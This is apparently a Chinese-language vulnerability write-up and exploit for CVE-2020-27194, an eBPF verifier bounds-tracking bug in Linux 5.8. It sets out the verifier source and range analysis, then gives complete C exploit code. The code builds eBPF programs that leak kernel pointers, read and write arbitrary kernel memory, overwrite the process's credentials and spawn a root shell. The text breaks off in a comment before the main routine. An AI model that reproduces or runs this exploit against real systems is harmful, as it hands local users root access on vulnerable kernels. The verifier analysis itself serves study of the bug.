CVE-2020-27194


环境搭建

version

Linux-5.8.14

config

CONFIG_DEBUG_INFO #调试符号
CONFIG_USER_NS=y #支持新的namespace
CONFIG_BPF_UNPRIV_DEFAULT_OFF=n # 默认允许非特权用户加载 eBPF

CONFIG_CGROUP_BPF=y
CONFIG_BPF=y
CONFIG_BPF_LSM=y
CONFIG_BPF_SYSCALL=y
CONFIG_ARCH_WANT_DEFAULT_BPF_JIT=y
CONFIG_BPF_JIT_ALWAYS_ON=y
CONFIG_BPF_JIT_DEFAULT_ON=y
CONFIG_BPF_PRELOAD=y
CONFIG_BPFILTER=y
CONFIG_BPFILTER_UMH=m
CONFIG_NET_CLS_BPF=y
CONFIG_NET_ACT_BPF=y
CONFIG_BPF_JIT=y
CONFIG_HAVE_EBPF_JIT=y
CONFIG_BPF_EVENTS=y
CONFIG_BPF_KPROBE_OVERRIDE=y
CONFIG_TEST_BPF=m
CONFIG_BPF_SYSCALL=y
CONFIG_BPFILTER=y
CONFIG_NET_CLS_BPF=y
CONFIG_NET_ACT_BPF=y
CONFIG_BPF_JIT=y
CONFIG_TEST_BPF=y

CONFIG_DEBUG_INFO #调试符号
CONFIG_USER_NS=y #支持新的namespace
make  CFLAGS_KERNEL="-g" CFLAGS_MODULE="-g" -j4

objtool

vim tools/objtool/elf.c

xt_TCPMSS.c

https://lore.kernel.org/bpf/CAM_iQpVyWmmOiz+x4fvQbeqQJ_u-bbCsY3o=aO4Yp0PmK8bYTg@mail.gmail.com/T/

vim net/netfilter/Makefile

分析

/* Linux 5.8 verifier (kernel/bpf/verifier.c), quoted for analysis:
 * 32-bit bounds tracking for a BPF_OR on scalars.  This is the function
 * containing the CVE-2020-27194 bug (see the else branch below).
 */
static void scalar32_min_max_or(struct bpf_reg_state *dst_reg,
struct bpf_reg_state *src_reg)
{
bool src_known = tnum_subreg_is_const(src_reg->var_off); /* are src's low 32 bits fully known? */
bool dst_known = tnum_subreg_is_const(dst_reg->var_off); /* are dst's low 32 bits fully known? */
struct tnum var32_off = tnum_subreg(dst_reg->var_off); /* dst's tnum restricted to the low 32 bits */
s32 smin_val = src_reg->smin_value; /* 64-bit signed min silently truncated to 32 bits */
u32 umin_val = src_reg->umin_value;

/* Assuming scalar64_min_max_or will be called so it is safe
 * to skip updating register for known case.
 */
if (src_known && dst_known)
return;

/* We get our maximum from the var_off, and our minimum is the
 * maximum of the operands' minima
 */

dst_reg->u32_min_value = max(dst_reg->u32_min_value, umin_val); /* OR can only grow an unsigned value, so take the larger of the two minima */
dst_reg->u32_max_value = var32_off.value | var32_off.mask; /* upper bound: assume every unknown bit is 1 */
if (dst_reg->s32_min_value < 0 || smin_val < 0) { /* either operand may be negative -> result's sign bit may end up set */
/* Lose signed bounds when ORing negative numbers,
 * ain't nobody got time for that.
 * (ORing negatives makes signed bounds useless, so give up
 * and widen them to the full range.)
 */
dst_reg->s32_min_value = S32_MIN;
dst_reg->s32_max_value = S32_MAX;
} else {
/* ORing two positives gives a positive, so safe to
 * cast result into s64.
 */
/* BUG (CVE-2020-27194): umin_value/umax_value are the 64-bit
 * unsigned bounds, which have NOT been updated for this OR yet
 * (scalar64_min_max_or runs afterwards).  The intended sources
 * are u32_min_value/u32_max_value, which were just computed
 * above.  Copying the stale 64-bit bounds lets the verifier
 * track a 32-bit signed range smaller than the real one.
 */
dst_reg->s32_min_value = dst_reg->umin_value;
dst_reg->s32_max_value = dst_reg->umax_value;
}
}

在这个函数的 else 分支里,dst_reg 的 s32_min_value/s32_max_value 被直接赋值为 dst_reg 的 umin_value/umax_value。问题在于这两个是 64 位无符号边界,而 scalar64_min_max_or 此时还没有执行,它们仍然保存着本次 OR 运算之前的旧范围;正确的来源应当是刚刚更新过的 u32_min_value/u32_max_value。于是 32 位有符号范围拿到了一个过期且过小的区间,这就是 CVE-2020-27194 的根因。随后才会调整 64 位边界:

/* Tighten the 32-bit min/max bounds of @reg using the bit-level knowledge
 * in its tnum (var_off): known-one bits raise the minima, unknown bits
 * raise the maxima.
 */
static void __update_reg32_bounds(struct bpf_reg_state *reg)
{
struct tnum var32_off = tnum_subreg(reg->var_off);

/* min signed is max(sign bit) | min(other bits) */
reg->s32_min_value = max_t(s32, reg->s32_min_value,
var32_off.value | (var32_off.mask & S32_MIN));
/* max signed is min(sign bit) | max(other bits) */
reg->s32_max_value = min_t(s32, reg->s32_max_value,
var32_off.value | (var32_off.mask & S32_MAX));
reg->u32_min_value = max_t(u32, reg->u32_min_value, (u32)var32_off.value);
reg->u32_max_value = min(reg->u32_max_value,
(u32)(var32_off.value | var32_off.mask));
}

/* 64-bit counterpart of __update_reg32_bounds: tighten smin/smax/umin/umax
 * from the full 64-bit tnum.
 */
static void __update_reg64_bounds(struct bpf_reg_state *reg)
{
/* min signed is max(sign bit) | min(other bits) */
reg->smin_value = max_t(s64, reg->smin_value,
reg->var_off.value | (reg->var_off.mask & S64_MIN)); /* S64_MIN == 0x8000000000000000: keep only the (possibly unknown) sign bit and OR it into value */
/* max signed is min(sign bit) | max(other bits) */
reg->smax_value = min_t(s64, reg->smax_value,
reg->var_off.value | (reg->var_off.mask & S64_MAX));
reg->umin_value = max(reg->umin_value, reg->var_off.value);
reg->umax_value = min(reg->umax_value,
reg->var_off.value | reg->var_off.mask);
}

/* Refresh both the 32-bit and 64-bit bounds from var_off. */
static void __update_reg_bounds(struct bpf_reg_state *reg)
{
__update_reg32_bounds(reg);
__update_reg64_bounds(reg);
}

总结一下:

smin是先用var_off算一个var_off.value可能为负则强制负数后的值,和自己两者取大;

smax是先将var_off中除了符号位之外的所有未知位全置1,和自己两者取小;

umin将自己和var_off.value 两者取大;

umax将自己和var_off.value所有未知位置1后的值 两者取小;

/* Uses signed min/max values to inform unsigned, and vice-versa */
static void __reg32_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
* If we cannot cross the sign boundary, then signed and unsigned bounds
* are the same, so combine. This works even in the negative case, e.g.
* -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
*/
if (reg->s32_min_value >= 0 || reg->s32_max_value < 0) { //如果不跨符号的情况
//不跨符号的比较是一致的
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
* boundary, so we must be careful.
*/
if ((s32)reg->u32_max_value >= 0) {
//无符号范围最高位恒0,说明有符号的边界值的跨符号是没有意义的
/* Positive. We can't learn anything from the smin, but smax
* is positive, hence safe.
*/
reg->s32_min_value = reg->u32_min_value;
reg->s32_max_value = reg->u32_max_value =
min_t(u32, reg->s32_max_value, reg->u32_max_value);
} else if ((s32)reg->u32_min_value < 0) {
//无符号范围最高位恒1,说明有符号的边界值的跨符号是没有意义的
/* Negative. We can't learn anything from the smax, but smin
* is negative, hence safe.
*/
reg->s32_min_value = reg->u32_min_value =
max_t(u32, reg->s32_min_value, reg->u32_min_value);
reg->s32_max_value = reg->u32_max_value;
}
}

/* 64-bit counterpart of __reg32_deduce_bounds: cross-pollinate signed and
 * unsigned 64-bit bounds.
 */
static void __reg64_deduce_bounds(struct bpf_reg_state *reg)
{
/* Learn sign from signed bounds.
 * If we cannot cross the sign boundary, then signed and unsigned bounds
 * are the same, so combine. This works even in the negative case, e.g.
 * -3 s<= x s<= -1 implies 0xf...fd u<= x u<= 0xf...ff.
 */
if (reg->smin_value >= 0 || reg->smax_value < 0) {
reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
reg->umin_value);
reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
reg->umax_value);
return;
}
/* Learn sign from unsigned bounds. Signed bounds cross the sign
 * boundary, so we must be careful.
 */
if ((s64)reg->umax_value >= 0) {
/* Positive. We can't learn anything from the smin, but smax
 * is positive, hence safe.
 */
reg->smin_value = reg->umin_value;
reg->smax_value = reg->umax_value = min_t(u64, reg->smax_value,
reg->umax_value);
} else if ((s64)reg->umin_value < 0) {
/* Negative. We can't learn anything from the smax, but smin
 * is negative, hence safe.
 */
reg->smin_value = reg->umin_value = max_t(u64, reg->smin_value,
reg->umin_value);
reg->smax_value = reg->umax_value;
}
}

/* Run both widths of signed<->unsigned bound deduction. */
static void __reg_deduce_bounds(struct bpf_reg_state *reg)
{
__reg32_deduce_bounds(reg);
__reg64_deduce_bounds(reg);
}

总结deduce:

如果有符号范围不跨符号,则比较大小是统一的,直接和无符号范围相统一(比较后min取大,max取小);

否则,如果发现无符号边界值的最高位是统一的,说明有符号边界值的符号是没意义的,要缩小范围,直接缩掉没用的符号(直接赋值),另一边比较后统一;

/* Attempts to improve var_off based on unsigned min/max information */
static void __reg_bound_offset(struct bpf_reg_state *reg)
{
struct tnum var64_off = tnum_intersect(reg->var_off,
tnum_range(reg->umin_value,
reg->umax_value));
struct tnum var32_off = tnum_intersect(tnum_subreg(reg->var_off),
tnum_range(reg->u32_min_value,
reg->u32_max_value));

reg->var_off = tnum_or(tnum_clear_subreg(var64_off), var32_off);
}

先执行 scalar32_min_max_or,再执行 scalar64_min_max_or;scalar64 的最后会调用一次 __update_reg_bounds,然后在 switch-case 中 break 退出,再依次执行:

​ __update_reg_bounds 重复执行两次,用var_off更新边界值;

​ __reg_deduce_bounds u和s之间的调整;

__reg_bound_offset 用边界值信息更新var_off

poc

PoC 第 15 行处 r1 的范围是 [0, 8];|0x100 之后 var_off = {value: 0x100, mask: 0xf}。但 scalar32_min_max_or 把范围搞错了——它使用了尚未更新的 64 位无符号范围,所以 32 位有符号范围被错误地更新为 [0, 8]。至此各范围为:

s32[0, 8]

u32[0x100 ,0x10f]

s64[-inf, inf]

u64[0, 8]

然后用var_off更新边界值:// var_off = {0x100, 0xf}

s32[0x100, 0x8]

u32[0x100 ,0x10f]

s64[0x100, 0x8]

u64[0x100, 0x10f]

然后是deduce:(全是符号统一的,所以直接比较后统一)

s32[0x100, 0x8]

u32[0x100 ,0x8]

s64[0x100, 0x8]

u64[0x100, 0x8]

因此得到了范围不合适的寄存器!

总结

__update_reg_bounds 重复执行两次,用var_off更新边界值;

smin是先用var_off算一个var_off.value可能为负则强制负数后的值,和自己两者取大;

smax是先将var_off中除了符号位之外的所有未知位全置1,和自己两者取小;

umin将自己和var_off.value 两者取大;

umax将自己和var_off.value所有未知位置1后的值 两者取小;

__reg_deduce_bounds u和s之间的调整;

如果有符号范围不跨符号,则比较大小是统一的,直接和无符号范围相统一(比较后min取大,max取小);

否则,如果发现无符号边界值的最高位是统一的,说明有符号边界值的符号是没意义的,要缩小范围,直接缩掉没用的符号(直接赋值),另一边比较后统一;

__reg_bound_offset 用边界值信息更新var_off

攻击成功

FINAL-EXP

exp:

#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <sched.h>
#include <sys/types.h>
#include <linux/keyctl.h>

size_t user_cs, user_ss, user_rflags, user_sp;
/*
 * Save the userland segment registers, stack pointer and rflags so a
 * kernel-mode payload could iretq back to user mode.
 * NOTE(review): this operand order ("mov user_cs, cs") only assembles with
 * -masm=intel — confirm the build flags.  Also, the saved state is never
 * consumed in this exploit (privilege escalation is a data-only cred
 * overwrite), so this is kept only as boilerplate.
 */
void save_status()
{
asm volatile (
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
);
puts("\033[34m\033[1m[*] Status has been saved.\033[0m");
}

/*
 * Spawn an interactive shell; after the cred overwrite it runs as root.
 * Fix: getpid() returns an int-sized pid_t, so printing it with %p was a
 * format-specifier mismatch (undefined behavior); use %d.
 */
void get_root_shell(){
	printf("now pid == %d\n", getpid());
	system("/bin/sh");
}

//CPU绑核
void bindCore(int core)
{
cpu_set_t cpu_set;

CPU_ZERO(&cpu_set);
CPU_SET(core, &cpu_set);
sched_setaffinity(getpid(), sizeof(cpu_set), &cpu_set);

printf("\033[34m\033[1m[*] Process binded to core \033[0m%d\n", core);
}

size_t page_offset_base;
int map_fd, expmap_fd;

#include <linux/bpf.h>
#include <stdint.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include "bpf_insn.h"

/* Thin wrapper around the raw bpf(2) syscall (glibc ships no stub for it).
 * Returns the syscall result: an fd / 0 on success, -1 with errno on error.
 */
static inline int bpf(int cmd, union bpf_attr *attr)
{
return syscall(__NR_bpf, cmd, attr, sizeof(*attr));
}

/*
 * Instruction prefix matching the PoC analysed above: load map value[0]
 * into r1, bound it to [0, 8] with a 64-bit JLE, then do a 32-bit
 * OR 0x100 — the operation whose 32-bit signed bounds
 * scalar32_min_max_or mis-tracks (CVE-2020-27194).
 * NOTE(review): unused by the final exploit (prog1/2/3 use VULREG), and
 * BPF_LD_MAP_FD(..., 3) hard-codes the assumption that the map is fd 3.
 * No comments inside the macro: a // comment would swallow the trailing
 * backslash continuation.
 */
#define CODE \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),\
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(),\
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 8, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 0x100),\

/*
 * Shared prefix for prog1/prog2/prog3: saves ctx in r9, looks up map
 * value (exits if the lookup fails) leaving r7 = &map_value, loads
 * value[0] into r1 and value[1] into r2, each bounded to [0, 1] by a
 * 64-bit JLE.  The 32-bit OR 2 then hits the CVE-2020-27194 bug in
 * scalar32_min_max_or: the 32-bit signed bounds are copied from the
 * stale 64-bit umin/umax, so after SUB 1 / ADD r2 / AND 2 the verifier
 * believes r6 == 0 while at runtime (value[0] == 1, value[1] == 0)
 * r6 == 2 (per the author's note below prog definitions).
 * NOTE(review): BPF_LD_MAP_FD(..., 3) hard-codes the map's fd as 3.
 * No comments inside the macro: a // comment would swallow the trailing
 * backslash continuation.
 */
#define VULREG \
BPF_MOV64_REG(BPF_REG_9, BPF_REG_1),\
BPF_LD_MAP_FD(BPF_REG_1, 3), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, 0), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(),\
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_7, 0),\
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 8),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_1, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU32_IMM(BPF_OR, BPF_REG_1, 2),\
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 1),\
BPF_JMP_IMM(BPF_JLE, BPF_REG_2, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(),\
BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2),\
BPF_ALU64_IMM(BPF_AND, BPF_REG_1, 2),\
BPF_MOV64_REG(BPF_REG_6, BPF_REG_1),\




//最终得到reg6实际为2,确信为0,前提是map_fd传递value[0] = 1, value[1] = 0,此时reg7指向map_fd的array

/* Leak program.  VULREG leaves r7 = &map_value and r6 = 2 (verifier: 0),
 * so the verifier accepts r7 -= r6*0x88 as a no-op while at runtime it
 * moves r7 back by 0x110 bytes, out of bounds of the value area.
 * NOTE(review): the 0x110 offset is assumed to land on kernel pointers in
 * front of the value area (main() treats value[0] as a kernel-text pointer
 * and value[1] as the map wait list) — confirm against the target kernel's
 * bpf_array layout.
 */
struct bpf_insn prog1[] = {
VULREG
BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), /* r1 = original value pointer (store target) */
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 0x110/2), /* r6 = 2*0x88 = 0x110 at runtime, 0 for the verifier */
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_6), /* r7 -= 0x110: OOB pointer before the value area */
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0), /* OOB read of a kernel qword */
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0), /* value[0] = leaked qword */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0xc0), /* second OOB slot at +0xc0 */
BPF_LDX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 8),
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0), /* value[1] = second leaked qword */

BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};


#define BPF_LOG_SZ 0x20000
char bpf_log_buf[BPF_LOG_SZ] = { '\0' };
/*
 * Load @cnt instructions as a socket-filter eBPF program.
 * On success returns the program fd; on failure dumps the verifier log,
 * prints the errno and returns -1.
 */
int load_prog(struct bpf_insn prog[], int cnt){
	union bpf_attr attr = {
		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
		.insns = (uint64_t) prog,
		.insn_cnt = cnt,
		.license = (uint64_t) "GPL",
		.log_level = 2,		/* verbose verifier log for debugging */
		.log_buf = (uint64_t) bpf_log_buf,
		.log_size = BPF_LOG_SZ,
	};

	int fd = bpf(BPF_PROG_LOAD, &attr);
	if (fd < 0) {
		puts(bpf_log_buf);
		perror("BPF_PROG_LOAD");
		return -1;
	}

	return fd;
}

/*
 * Attach @prog_fd as a socket filter to one end of a UNIX datagram pair and
 * write one datagram through it so the filter actually runs in-kernel.
 * Fixes: bail out if socketpair() fails (the fds were garbage otherwise),
 * zero the payload buffer (it was sent uninitialized), and close both
 * socket fds (they leaked on every call).
 */
void trigger_prog(int prog_fd){
	int sockets[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0) {
		perror("socketpair()");
		return;
	}

	if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &prog_fd, sizeof(prog_fd)) < 0)
		perror("socketpair SO_ATTACH_BPF");

	char s[0x1000] = { 0 };	/* payload content is irrelevant; only the write matters */
	if (write(sockets[0], s, 0x100) < 0)
		perror("write");

	close(sockets[0]);
	close(sockets[1]);
}





/*
 * Create a BPF map of @map_type with the given @key_size/@value_size and
 * @max_entries.  Returns the new map fd, or -1 with errno set.
 */
static __always_inline int
bpf_map_create(unsigned int map_type, unsigned int key_size,
unsigned int value_size, unsigned int max_entries)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_type = map_type;
	attr.key_size = key_size;
	attr.value_size = value_size;
	attr.max_entries = max_entries;

	return bpf(BPF_MAP_CREATE, &attr);
}

/*
 * Look up @key in @map_fd and copy the stored element into @value
 * (BPF_MAP_LOOKUP_ELEM).  Returns 0 on success, -1 with errno on failure.
 */
static __always_inline int
bpf_map_get_elem(int map_fd, const void *key, void *value)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_fd = map_fd;
	attr.key = (uint64_t)key;
	attr.value = (uint64_t)value;

	return bpf(BPF_MAP_LOOKUP_ELEM, &attr);
}

/*
 * Fetch the btf_id of the map behind @map_fd via BPF_OBJ_GET_INFO_BY_FD.
 * Fixes: @info was left uninitialized and the bpf() result was ignored, so
 * a failed syscall returned stack garbage.  Now the struct is zeroed and a
 * failure yields 0 (never a valid btf_id).
 */
static __always_inline uint32_t
bpf_map_get_info_by_fd(int map_fd)
{
	struct bpf_map_info info = {0};
	union bpf_attr attr = {
		.info.bpf_fd = map_fd,
		.info.info_len = sizeof(info),
		.info.info = (uint64_t)&info,
	};

	if (bpf(BPF_OBJ_GET_INFO_BY_FD, &attr) < 0)
		return 0;
	return info.btf_id;
}

/*
 * Insert or replace the element under @key in @map_fd with @value
 * (BPF_MAP_UPDATE_ELEM, semantics selected by @flags, e.g. BPF_ANY).
 * Returns 0 on success, -1 with errno on failure.
 */
static __always_inline int
bpf_map_update_elem(int map_fd, const void* key, const void* value, uint64_t flags)
{
	union bpf_attr attr;

	memset(&attr, 0, sizeof(attr));
	attr.map_fd = map_fd;
	attr.key = (uint64_t)key;
	attr.value = (uint64_t)value;
	attr.flags = flags;

	return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

size_t ker_offset;


/*
 * Create a BPF_MAP_TYPE_ARRAY_OF_MAPS whose inner-map template is the map
 * behind @fd.  Returns the outer map fd, or -1 on failure.
 */
int create_bpf_array_of_map(int fd, int key_size, int value_size, int max_entries) {
	union bpf_attr attr = {
		.map_type = BPF_MAP_TYPE_ARRAY_OF_MAPS,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries,
		.inner_map_fd = fd,
	};

	int ret = syscall(SYS_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
	return ret < 0 ? -1 : ret;
}

/* AAR program.  VULREG leaves r7 = &map_value and r6 = 2 (verifier: 0).
 * bpf_skb_load_bytes() is called with len = 8 + r6*4, i.e. 16 at runtime
 * while the verifier only accounts for 8 bytes, so the copy also clobbers
 * the stack slot at fp-8 where r7 was spilled: packet qword data[1]
 * replaces the spilled pointer, is loaded back and dereferenced, and the
 * qword it points to is stored into the map value for userspace to read.
 */
struct bpf_insn prog2[] = {
VULREG
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0), /* spill map-value ptr to fp-8 */

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = skb ctx */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), /* r2 = fp-16 */
BPF_MOV64_REG(BPF_REG_3, BPF_REG_2), /* r3 = dest buffer (fp-16) */
BPF_MOV64_IMM(BPF_REG_2, 0), /* r2 = packet offset 0 */
BPF_MOV64_IMM(BPF_REG_4, 8), /* len = 8 ... */
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6), /* ... + r6*4 = 16 at runtime */
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),

BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0), /* r1 = overwritten slot = target address */
BPF_LDX_MEM(BPF_DW, BPF_REG_4, BPF_REG_1, 0), /* r4 = *target (arbitrary read) */
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_4, 0), /* value[0] = r4 */


BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};

/*
 * Arbitrary kernel read: returns the qword at kernel address @addr using
 * the AAR program @aar_prog_fd attached to a fresh socket pair.
 * Fixes vs. original: @key was read uninitialized (UB, and the map update
 * could target a random index and fail), the local buffers were partially
 * uninitialized, and the two socket fds leaked on every call — which
 * matters because the task_struct walk calls aar() in a loop.
 */
size_t aar(size_t addr, int aar_prog_fd){
	int sockets[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
		perror("socketpair()");

	if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)
		perror("socketpair SO_ATTACH_BPF");

	size_t key = 0;			/* the array map has a single slot at index 0 */
	size_t value[0x1000] = { 0 };
	value[0] = 1LL;			/* drives VULREG's runtime path (r6 = 2) */
	value[1] = 0LL;
	bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

	size_t data[0x1000] = { 0 };
	data[0] = addr;
	data[1] = addr;			/* data[1] overwrites the spilled map-value pointer in prog2 */
	if (write(sockets[0], data, 0x100) < 0)
		perror("write");

	value[0] = 0x12341234LL;	/* sentinel: unchanged means the read did not happen */
	bpf_map_get_elem(map_fd, &key, value);

	close(sockets[0]);
	close(sockets[1]);

	return value[0];
}

/* AAW program: same stack-clobber trick as prog2, but the 16-byte
 * skb_load_bytes copy supplies both operands: packet qword data[1]
 * (landing at fp-8) is the target address and data[0] (at fp-16) is the
 * qword written through it.
 */
struct bpf_insn prog3[] = {
VULREG
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_STX_MEM(BPF_DW, BPF_REG_2, BPF_REG_7, 0), /* spill map-value ptr to fp-8 */

BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), /* r1 = skb ctx */
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), /* r2 = fp-16 */
BPF_MOV64_REG(BPF_REG_3, BPF_REG_2), /* r3 = dest buffer (fp-16) */
BPF_MOV64_IMM(BPF_REG_2, 0),
BPF_MOV64_IMM(BPF_REG_4, 8), /* len = 8 + r6*4 = 16 at runtime */
BPF_ALU64_IMM(BPF_MUL, BPF_REG_6, 4),
BPF_ALU64_REG(BPF_ADD, BPF_REG_4, BPF_REG_6),
BPF_RAW_INSN(BPF_JMP|BPF_CALL, 0, 0, 0, BPF_FUNC_skb_load_bytes),

BPF_MOV64_REG(BPF_REG_2, BPF_REG_10),
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_2, 0), //goal_addr
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8),
BPF_LDX_MEM(BPF_DW, BPF_REG_3, BPF_REG_2, 0), //value
BPF_STX_MEM(BPF_DW, BPF_REG_1, BPF_REG_3, 0), /* *goal_addr = value (arbitrary write) */


BPF_MOV64_IMM(BPF_REG_0, 0),
BPF_EXIT_INSN(),
};
/*
 * Arbitrary kernel write: stores @val at kernel address @addr using the
 * AAW program @aar_prog_fd attached to a fresh socket pair.
 * Fixes vs. original: @key was read uninitialized (UB, random map index),
 * both socket fds leaked on every call, and the function was declared
 * size_t but fell off the end without a return statement — UB if the
 * caller ever used the result.  It now always returns 0.
 */
size_t aaw(size_t addr, int aar_prog_fd, size_t val){
	int sockets[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets) < 0)
		perror("socketpair()");

	if (setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &aar_prog_fd, sizeof(aar_prog_fd)) < 0)
		perror("socketpair SO_ATTACH_BPF");

	size_t key = 0;			/* the array map has a single slot at index 0 */
	size_t value[0x1000] = { 0 };
	value[0] = 1LL;			/* drives VULREG's runtime path (r6 = 2) */
	value[1] = 0LL;
	bpf_map_update_elem(map_fd, &key, value, BPF_ANY);

	size_t data[0x1000] = { 0 };
	data[0] = val;			/* qword to write */
	data[1] = addr;			/* target address (replaces the spilled pointer in prog3) */
	if (write(sockets[0], data, 0x100) < 0)
		perror("write");

	close(sockets[0]);
	close(sockets[1]);

	return 0;
}

size_t init_task;
size_t comm_off, cred_off, task_off;
#include <sys/prctl.h>
/*
 * Rename this task, walk the kernel task list with the AAR primitive to
 * find our own task_struct by comm, then zero the id fields of our cred
 * with the AAW primitive.
 * NOTE(review): both parameters are immediately overwritten with freshly
 * loaded programs — they are effectively unused; kept for ABI stability.
 * Fixes vs. original: load_prog() takes a struct bpf_insn[] but was passed
 * &progN (type struct bpf_insn (*)[N], an incompatible-pointer-type
 * conversion); and on a failed walk my_task stayed (size_t)-1 and was then
 * dereferenced via AAR/AAW — now guarded.
 */
void aar_aaw(int aar_prog_fd, int aaw_prog_fd){
	if(prctl(PR_SET_NAME, "QianYiming", NULL, NULL, NULL) < 0){
		perror("prctl set name");
	}
	size_t task = init_task+task_off;
	size_t my_task = -1;
	aar_prog_fd = load_prog(prog2, sizeof(prog2)/sizeof(prog2[0]));

	/* follow task->tasks.next until the comm field matches our name */
	while(task){
		task = aar(task, aar_prog_fd);
		size_t name = aar(task-task_off+comm_off, aar_prog_fd);
		if(!memcmp(&name, "QianYiming", 8)){
			my_task = task-task_off;
			break;
		}
	}
	if (my_task == (size_t)-1) {
		puts("[-] own task_struct not found");
		return;
	}
	printf("my_task == %p\n", (void *)my_task);
	size_t my_cred = aar(my_task+cred_off, aar_prog_fd);
	printf("my_cred == %p\n", (void *)my_cred);

	aaw_prog_fd = load_prog(prog3, sizeof(prog3)/sizeof(prog3[0]));

	/* zero the first 6 id qwords of struct cred -> uid/gid/... become 0 */
	for(int i = 0; i <= 0x28; i += 8){
		aaw(my_cred+i, aaw_prog_fd, 0LL);
	}
}


/*
 * Exploit driver for CVE-2020-27194: create the maps, trigger prog1 for
 * the kernel-text leak, compute the KASLR slide, walk the task list via
 * AAR to find our task_struct, zero our cred via AAW, and spawn a shell.
